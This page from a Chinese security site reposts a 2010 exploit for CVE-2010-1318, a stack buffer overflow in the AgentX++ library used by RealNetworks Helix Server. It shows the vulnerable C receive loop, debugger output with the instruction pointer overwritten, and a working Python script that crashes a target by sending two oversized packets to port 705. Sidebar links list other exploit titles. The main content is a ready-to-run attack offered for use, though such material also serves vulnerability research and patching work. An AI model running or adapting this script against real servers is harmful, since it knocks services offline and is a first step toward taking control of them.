首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Multiple Vendor AgentX++ Stack Buffer Overflow
来源:ZSploit.com 作者:ZSploit 发布时间:2010-04-19  

# Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow
Vulnerability
# Date: 2010-04-17
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: RealNetworks Helix Server v11
# CVE : CVE-2010-1318

#! /usr/bin/env python
###############################################################################
## File       :  zs_agentx_bof.py
## Description:
##            :
## Created_On :  Apr 17 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
int AgentX::receive_agentx(int sd, AgentXPdu& pdu)
{

    u_char        buffer[AGENTX_HEADER_LEN+1];                [1]
    u_int        payloadLen;
    boolean        netByteOrder;
    int        status;

    //  read header
    unsigned int bytesRead = 0;
    while (bytesRead < AGENTX_HEADER_LEN) {                     [2]
#ifdef WIN32
        if ((status = recv(sd, (char*)(buffer+bytesRead),
               AGENTX_HEADER_LEN, 0)) <= 0) {

        if (status == 0) return AGENTX_DISCONNECT;
        if (status == SOCKET_ERROR) {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive socket error (errno)");
            LOG(WSAGetLastError());
            LOG_END;
            return AGENTX_DISCONNECT;
        }
        else {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive unknown error (status)");
            LOG(status);
            LOG_END;
            return AGENTX_DISCONNECT;
        }
        }
#else
        if ((status = read(sd, (void *)(buffer+bytesRead),
                   AGENTX_HEADER_LEN)) <= 0) {

        if (status == 0) return AGENTX_DISCONNECT;
        if (errno == EBADF) return AGENTX_BADF;
        else {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive unknown error (errno)");
            LOG(errno);
            LOG_END;
            return AGENTX_ERROR;
        }
        }
#endif
        bytesRead += status;
    }


[1] Allocates 0x14 bytes stack buffer
[2] The check should be consider the remainder bytes of the buffer

if we only send the data < 0x13 bytes, 2 packets will overwrite the stack
buffer.

0:009> g
(728.a3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14
edi=00ccff80
eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010202
41414141 ??              ???
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\mswsock.dll -
0:006> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00cbfd04 00edda20 0x41414141
00cbfd18 7c829fb5 0xedda20
00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38
00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126
00000000 00000000 mswsock+0x1a03

"""

import sys
import socket

if (len(sys.argv) != 2):
    print "Usage:\t%s [target]" % sys.argv[0]
    sys.exit(0)


data = "A" * 19

host = sys.argv[1]
port = 705

print "PoC for CVE-2010-1318 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    s.connect((host, port))
    print "Sending payload .."
        s.send(data)
    s.send(data)
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows 7/2008R2 SMB Client Tr
·14 Bytes execve("a->/bin/sh")
·Unauthenticated File-system Ac
·33 Bytes chmod("/etc/shadow",
·Apache OFBiz FULLADMIN Creator
·TweakFS 1.0 (FSX Edition) Stac
·Apache OFBiz SQL Remote Execut
·AVTECH Software (AVC781Viewer.
·PHP 5.3.x DoS
·Huawei EchoLife HG520c Denial
·Archive Searcher .zip Stack Ov
·Huawei EchoLife HG520 Remote I
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved